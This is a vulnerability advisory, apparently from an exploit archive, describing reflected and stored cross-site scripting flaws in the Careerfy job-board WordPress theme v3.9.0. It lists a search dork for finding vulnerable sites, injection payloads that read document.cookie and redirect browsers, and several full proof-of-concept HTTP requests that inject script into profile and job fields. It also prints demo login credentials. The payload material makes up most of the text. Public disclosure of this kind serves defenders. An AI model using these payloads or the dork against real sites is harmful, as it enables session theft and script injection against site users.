Careerfy - Job Board WordPress Theme v3.9.0 - Multiple Vulnerabilities

2020.07.17
ru Vlad Vector (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/wp-content/themes/careerfy/

[+] Exploit Title: Careerfy - Job Board WordPress Theme v3.9.0 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/themes/careerfy/ [+] Date: 2020-07-01 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Eyecix [ http://eyecix.com ] [+] Software Version: 3.9.0 [+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the Careerfy Job Board theme through 3.9.0 for WordPress. [i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself. [i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password) [i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password) [i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/ [i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/ [i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc/ ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS -> /?location=[payload] [x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Academic Level, Age, Salary, Gender, Industry, Full Address) [x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address) [x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address) ### [ Payloads: ] [$] " autofocus onfocus=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; "> [$] "><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;> [$] "><img src=x onerror="alert(document.cookie);"> ### [ PoC Unauthenticated Reflected XSS: ] [!] https://careerfy.net/petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50 [!] GET /petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50 HTTP/1.1 Host: careerfy.net [!] https://careerfy.net/careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time [!] GET /careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time HTTP/1.1 Host: careerfy.net ### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ] [!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1 Host: careerfy.net Content-Type: multipart/form-data; boundary=---------------------------122256774439635172062989578806 Content-Length: 5335 Origin: https://careerfy.net Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings Cookie: [cookies_here] -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="user_cvr_photo_cand"; filename="" Content-Type: application/octet-stream -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="u_firstname" Vlad -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="u_lastname" Vector -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="user_profile_slug" vladvector -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_user_public_pview" yes -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_user_dob_whole" 01-07-2020 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="user_phone" OK -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="dial_code" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="contry_iso_code" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="user_sector" 41 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle" XSS -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="candidate_salary_type" type_1 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="candidate_salary" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="candidate_salary_currency" default -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="candidate_salary_pos" left -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="candidate_salary_sep" , -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="candidate_salary_deci" 2 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="user_bio" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="academic-level" masters-degree"><img src=x onerror=alert(document.cookie);> -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="Age" 18-22-years"><img src=x onerror=alert(document.domain);> -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="salary" 1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);> -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="gender" hacker"><img src=x onerror=alert(`YAY!`);> -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="industry" web-security"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;> -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="cand_user_facebook_url" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="cand_user_twitter_url" https://twitter.com/vlad_vector -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="cand_user_linkedin_url" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="cand_user_dribbble_url" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_location1" Russian Federation -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_location2" Moscow -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_address" 1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);> -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_lat" 0 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_lng" 0 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="jobsearch_field_location_zoom" 0 -----------------------------122256774439635172062989578806 Content-Disposition: form-data; name="user_settings_form" 1 -----------------------------122256774439635172062989578806-- ### [ PoC Authenticated Persistent XSS -> Employer Profile: ] [!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1 Host: careerfy.net Content-Type: multipart/form-data; boundary=---------------------------207058957013654520581670329262 Content-Length: 5853 Origin: https://careerfy.net Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings Cookie: [cookies_here] -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_cvr_photo"; filename="" Content-Type: application/octet-stream -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="u_firstname" Vlad -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="u_lastname" Vector -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="display_name" PoC -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_profile_slug" vladvector -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_user_public_pview" yes -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_phone" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="dial_code" 7 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="contry_iso_code" ru -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_website" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_sector" 33 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_dob_mm" 7 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_dob_dd" 1 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_dob_yy" 2020 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_bio" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="founded-since" 2018 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="emp_user_facebook_url" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="emp_user_twitter_url" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="emp_user_linkedin_url" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="emp_user_dribbble_url" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_location1" Russian Federation -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_location2" Moscow -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_location3" Moscow -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_address" OK"><img src=x onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_lat" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_lng" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_location_zoom" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="team_image"; filename="" Content-Type: image/jpeg -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_title[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_designation[]" 1337"><img src=x onerror=alert(document.domain);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_experience[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="team_image"; filename="" Content-Type: application/octet-stream -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_image[]" -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_facebook[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_google[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_twitter[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="jobsearch_field_team_description[]" 1337"><img src=x onerror=alert(document.cookie);> -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="user_settings_form" 1 -----------------------------207058957013654520581670329262 Content-Disposition: form-data; name="terms_cond_check" on -----------------------------207058957013654520581670329262-- ### [ PoC Authenticated Persistent XSS -> Job Page: ] [!] POST /careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update HTTP/1.1 Host: careerfy.net Content-Type: multipart/form-data; boundary=---------------------------5410881451781327061235735546 Content-Length: 4680 Origin: https://careerfy.net Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update Cookie: [cookies_here] -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_title" PoC -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_detail" PoC -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="application_deadline" July 2, 2020 2:48 pm"><img src=x onerror=alert(document.cookie);> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_sector" 33 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_type" 21 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="get_job_skills[]" Developer"><img src=x onerror="alert(document.cookie);"> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_apply_type" internal"><img src=x onerror="alert(document.cookie);"> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_apply_url" -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_apply_email" -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_salary_type" type_1 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_salary" 13 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_max_salary" 13 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_salary_currency" default -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_salary_pos" left -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_salary_sep" , -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_salary_deci" 2 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="offered-salary" -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="career-level" officer"><img src=x onerror="alert(document.domain);"> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="experience" less-than-1-year"><img src=x onerror="alert(document.cookie);"> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="gender" male"><img src=x onerror="alert(document.domain);"> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="Industry" development"><img src=x onerror="alert(document.cookie);"> -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="qualifications" certificate"><img src=x onerror=alert(document.domain); > -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="job_attach_files[]"; filename="" Content-Type: application/octet-stream -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_location1" Russian Federation -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_location2" Moscow -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_location3" Moscow -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_address" 1337"><img src=x onerror=alert(`VLADVECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; > -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_lat" 55.761035 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_lng" 37.536004 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="jobsearch_field_location_zoom" 9.719789233510344 -----------------------------5410881451781327061235735546 Content-Disposition: form-data; name="user_job_posting" 1 -----------------------------5410881451781327061235735546-- ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-01-careerfy-job-board-wordpress-theme-v3-9-0.txt
https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top